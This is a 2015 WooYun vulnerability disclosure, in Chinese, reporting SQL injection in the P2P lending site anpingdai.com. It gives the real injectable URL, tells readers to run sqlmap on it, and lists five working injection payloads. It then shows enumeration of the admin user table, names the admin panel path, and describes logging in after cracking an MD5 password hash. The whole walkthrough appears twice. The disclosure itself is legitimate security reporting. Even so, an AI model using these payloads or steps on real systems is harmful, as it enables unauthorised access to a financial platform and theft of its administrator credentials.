当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138868

漏洞标题:安平贷p2p网贷平台注入漏洞可登录后台影响资金安全

相关厂商:anpingdai.com

漏洞作者: 路人甲

提交时间:2015-09-08 15:33

修复时间:2015-10-23 16:32

公开时间:2015-10-23 16:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-08: 细节已通知厂商并且等待厂商处理中
2015-09-08: 厂商已经确认,细节仅向厂商公开
2015-09-18: 细节向核心白帽子及相关领域专家公开
2015-09-28: 细节向普通白帽子公开
2015-10-08: 细节向实习白帽子公开
2015-10-23: 细节向公众公开

简要描述:

想贷点钱可以吗

详细说明:

注入点:

https://www.anpingdai.com/index.php?s=/Home/About/infoDetails/category_id/6/id/12.html


https://www.anpingdai.com/index.php?s=/Home/About/infoDetails/category_id/6/id/12*.html 放入sqlmap跑一下吧

Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12) AND 1950=1950 AND (8267=8267.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12) AND (SELECT 3358 FROM(SELECT COUNT(*),CONCAT(0x3a7779793a,(SELECT (CASE WHEN (3358=3358) THEN 1 ELSE 0 END)),0x3a766c713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3545=3545.html
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12) LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7779793a,0x55487448694258727a4d,0x3a766c713a), NULL, NULL, NULL-- .html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12); SELECT SLEEP(5);-- .html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12) AND SLEEP(5) AND (5215=5215.html
---


基本集合的所有的注入
看表

1.png


后台管理员:

Database: anpingdai
+--------------+---------+
| Table | Entries |
+--------------+---------+
| v_admin_user | 14 |
+--------------+---------+


手动试一下后台地址:

https://www.anpingdai.com/index.php?s=/Admin/


md5解密登录一个

222.png

漏洞证明:

注入点:

https://www.anpingdai.com/index.php?s=/Home/About/infoDetails/category_id/6/id/12.html


https://www.anpingdai.com/index.php?s=/Home/About/infoDetails/category_id/6/id/12*.html 放入sqlmap跑一下吧

Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12) AND 1950=1950 AND (8267=8267.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12) AND (SELECT 3358 FROM(SELECT COUNT(*),CONCAT(0x3a7779793a,(SELECT (CASE WHEN (3358=3358) THEN 1 ELSE 0 END)),0x3a766c713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3545=3545.html
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12) LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7779793a,0x55487448694258727a4d,0x3a766c713a), NULL, NULL, NULL-- .html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12); SELECT SLEEP(5);-- .html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: https://www.anpingdai.com:443/index.php?s=/Home/About/infoDetails/category_id/6/id/12) AND SLEEP(5) AND (5215=5215.html
---


基本集合的所有的注入
看表

1.png


后台管理员:

Database: anpingdai
+--------------+---------+
| Table | Entries |
+--------------+---------+
| v_admin_user | 14 |
+--------------+---------+


手动试一下后台地址:

https://www.anpingdai.com/index.php?s=/Admin/


md5解密登录一个

222.png

修复方案:

需要改进的有很多
什么也没做,仅证明。多给点分,混个脸熟

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-08 16:30

厂商回复:

感谢你的提交,我们正在处理中

最新状态:

暂无